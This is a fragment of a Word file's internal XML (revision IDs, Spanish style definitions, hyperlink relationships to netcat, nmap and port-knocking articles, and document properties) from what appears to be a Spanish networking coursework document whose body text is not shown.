    <w:rsid w:val="00300D9B"/>
    <w:rsid w:val="0030123C"/>
    <w:rsid w:val="00307846"/>
    <w:rsid w:val="00316619"/>
    <w:rsid w:val="00352E7C"/>
    <w:rsid w:val="00377D7E"/>
    <w:rsid w:val="003C2457"/>
    <w:rsid w:val="003C7B54"/>
    <w:rsid w:val="003D67A3"/>
    <w:rsid w:val="003F3B69"/>
    <w:rsid w:val="004052AD"/>
    <w:rsid w:val="0040751F"/>
    <w:rsid w:val="00423101"/>
    <w:rsid w:val="004322E5"/>
    <w:rsid w:val="00436A40"/>
    <w:rsid w:val="00443F22"/>
    <w:rsid w:val="00445761"/>
    <w:rsid w:val="00493D3A"/>
    <w:rsid w:val="004A57D9"/>
    <w:rsid w:val="004C41F5"/>
    <w:rsid w:val="004D3B1B"/>
    <w:rsid w:val="004E4706"/>
    <w:rsid w:val="00515EC5"/>
    <w:rsid w:val="00522376"/>
    <w:rsid w:val="0052240F"/>
    <w:rsid w:val="0052516B"/>
    <w:rsid w:val="00534658"/>
    <w:rsid w:val="00535A0B"/>
    <w:rsid w:val="00550E28"/>
    <w:rsid w:val="00584ACA"/>
    <w:rsid w:val="00586F02"/>
    <w:rsid w:val="005871EF"/>
    <w:rsid w:val="00595CA4"/>
    <w:rsid w:val="005B4371"/>
    <w:rsid w:val="005B5B0E"/>
    <w:rsid w:val="005C357D"/>
    <w:rsid w:val="005D762F"/>
    <w:rsid w:val="00622A01"/>
    <w:rsid w:val="00625BEE"/>
    <w:rsid w:val="00656ED8"/>
    <w:rsid w:val="006608F1"/>
    <w:rsid w:val="006857C1"/>
    <w:rsid w:val="00692486"/>
    <w:rsid w:val="00692C5E"/>
    <w:rsid w:val="00694602"/>
    <w:rsid w:val="006A4BC6"/>
    <w:rsid w:val="006A7DC8"/>
    <w:rsid w:val="006B07F8"/>
    <w:rsid w:val="006B6329"/>
    <w:rsid w:val="006C1015"/>
    <w:rsid w:val="006E0115"/>
    <w:rsid w:val="0070026F"/>
    <w:rsid w:val="007053E9"/>
    <w:rsid w:val="00724AD4"/>
    <w:rsid w:val="00733CCD"/>
    <w:rsid w:val="00740EA6"/>
    <w:rsid w:val="007420B0"/>
    <w:rsid w:val="00744BD2"/>
    <w:rsid w:val="00750458"/>
    <w:rsid w:val="00777DEE"/>
    <w:rsid w:val="00787E68"/>
    <w:rsid w:val="00795A1B"/>
    <w:rsid w:val="007B0FCD"/>
    <w:rsid w:val="007C020F"/>
    <w:rsid w:val="007C0538"/>
    <w:rsid w:val="007E5F44"/>
    <w:rsid w:val="007E71A8"/>
    <w:rsid w:val="007F7233"/>
    <w:rsid w:val="007F7277"/>
    <w:rsid w:val="00815D0E"/>
    <w:rsid w:val="008169F3"/>
    <w:rsid w:val="00825A92"/>
    <w:rsid w:val="008400A5"/>
    <w:rsid w:val="00844DC3"/>
    <w:rsid w:val="00873250"/>
    <w:rsid w:val="0088588A"/>
    <w:rsid w:val="008A0553"/>
    <w:rsid w:val="008B570E"/>
    <w:rsid w:val="008B58DE"/>
    <w:rsid w:val="008E6631"/>
    <w:rsid w:val="00935DA0"/>
    <w:rsid w:val="00955F57"/>
    <w:rsid w:val="00957A29"/>
    <w:rsid w:val="00970893"/>
    <w:rsid w:val="00981B19"/>
    <w:rsid w:val="009822F9"/>
    <w:rsid w:val="00985EE0"/>
    <w:rsid w:val="009971B8"/>
    <w:rsid w:val="00997747"/>
    <w:rsid w:val="009B095E"/>
    <w:rsid w:val="009B2BA4"/>
    <w:rsid w:val="009B5A12"/>
    <w:rsid w:val="009B750B"/>
    <w:rsid w:val="009C7AA8"/>
    <w:rsid w:val="009D36BA"/>
    <w:rsid w:val="009E1361"/>
    <w:rsid w:val="009E303F"/>
    <w:rsid w:val="009F3F19"/>
    <w:rsid w:val="009F6217"/>
    <w:rsid w:val="00A078B4"/>
    <w:rsid w:val="00A368F0"/>
    <w:rsid w:val="00A52BEE"/>
    <w:rsid w:val="00A805C4"/>
    <w:rsid w:val="00A91C6A"/>
    <w:rsid w:val="00A92F3C"/>
    <w:rsid w:val="00AA0080"/>
    <w:rsid w:val="00AA607C"/>
    <w:rsid w:val="00AA7C77"/>
    <w:rsid w:val="00AB09F9"/>
    <w:rsid w:val="00AD1312"/>
    <w:rsid w:val="00AD3382"/>
    <w:rsid w:val="00B21171"/>
    <w:rsid w:val="00B3023E"/>
    <w:rsid w:val="00B3661B"/>
    <w:rsid w:val="00B52B55"/>
    <w:rsid w:val="00B64426"/>
    <w:rsid w:val="00BA5F3D"/>
    <w:rsid w:val="00BC32EF"/>
    <w:rsid w:val="00BC4A68"/>
    <w:rsid w:val="00BD688D"/>
    <w:rsid w:val="00BE05CD"/>
    <w:rsid w:val="00BE7D40"/>
    <w:rsid w:val="00C13191"/>
    <w:rsid w:val="00C24B15"/>
    <w:rsid w:val="00C3346A"/>
    <w:rsid w:val="00C469DF"/>
    <w:rsid w:val="00C54DBF"/>
    <w:rsid w:val="00C946C5"/>
    <w:rsid w:val="00CA1703"/>
    <w:rsid w:val="00CA7704"/>
    <w:rsid w:val="00CC5824"/>
    <w:rsid w:val="00CF3F0A"/>
    <w:rsid w:val="00CF6FF9"/>
    <w:rsid w:val="00D036A0"/>
    <w:rsid w:val="00D1470E"/>
    <w:rsid w:val="00D14C50"/>
    <w:rsid w:val="00D1645E"/>
    <w:rsid w:val="00D31ABA"/>
    <w:rsid w:val="00D43738"/>
    <w:rsid w:val="00D724C4"/>
    <w:rsid w:val="00D904B7"/>
    <w:rsid w:val="00DA2F7D"/>
    <w:rsid w:val="00DA60DE"/>
    <w:rsid w:val="00DC6F25"/>
    <w:rsid w:val="00DF3D8B"/>
    <w:rsid w:val="00E0440D"/>
    <w:rsid w:val="00E07059"/>
    <w:rsid w:val="00E10ACE"/>
    <w:rsid w:val="00E142BC"/>
    <w:rsid w:val="00E65C2A"/>
    <w:rsid w:val="00E90697"/>
    <w:rsid w:val="00EB292A"/>
    <w:rsid w:val="00EC383F"/>
    <w:rsid w:val="00ED1778"/>
    <w:rsid w:val="00EE6F7C"/>
    <w:rsid w:val="00EF5D40"/>
    <w:rsid w:val="00F1521F"/>
    <w:rsid w:val="00F50479"/>
    <w:rsid w:val="00F544F9"/>
    <w:rsid w:val="00F62D2C"/>
    <w:rsid w:val="00F67186"/>
    <w:rsid w:val="00F67DCD"/>
    <w:rsid w:val="00F72E06"/>
    <w:rsid w:val="00F97241"/>
    <w:rsid w:val="00FA639E"/>
    <w:rsid w:val="00FA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A970"/>
  <w15:docId w15:val="{2BD2E2EF-DF6E-450A-A7CD-3EBF380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3D3A"/>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5B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493D3A"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="4F81BD" w:themeColor="accent1"/>
      <w:sz w:val="26"/>
      <w:szCs w:val="26"/>
      <w:u w:val="single"/>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TtuloTDC">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Ttulo1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00CA7704"/>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CA7704"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AA0080"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Ttulo4Car">
    <w:name w:val="Título 4 Car"/>
    <w:basedOn w:val="Fuentedeprrafopredeter"/>
    <w:link w:val="Ttulo4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="005B5B0E"/>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692486"/>
    <w:pPr>
      <w:spacing w:after="200"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
      <w:iCs/>
      <w:color w:val="1F497D" w:themeColor="text2"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009D36BA"/>
    <w:pPr>
      <w:spacing w:after="100"/>
      <w:ind w:left="220"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TDC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009D36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unix.stackexchange.com/questions/492766/usage-of-nc-with-timeouts-in-m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unix.stackexchange.com/questions/368155/what-are-the-differences-between-ncat-nc-and-netcat"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yperlink" Target="timeouts" TargetMode="External"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://linuxize.com/post/netcat-nc-command-with-examp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unix.stackexchange.com/questions/368155/what-are-the-differences-between-ncat-nc-and-net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elivesecurity.com/la-es/2013/03/08/port-knocking-para-reforzar-la-seguridad-de-un-servido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nmap.org/download.html"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keepcoding.io/blog/que-es-netcat/"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98DD-C676-4710-BFA7-821B152D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289</Words>
  <Characters>125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javi2005gago@digitechmad.local</cp:lastModifiedBy>
  <cp:revision>155</cp:revision>
  <cp:lastPrinted>2010-09-27T12:31:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-09-02T14:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-11-14T10:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>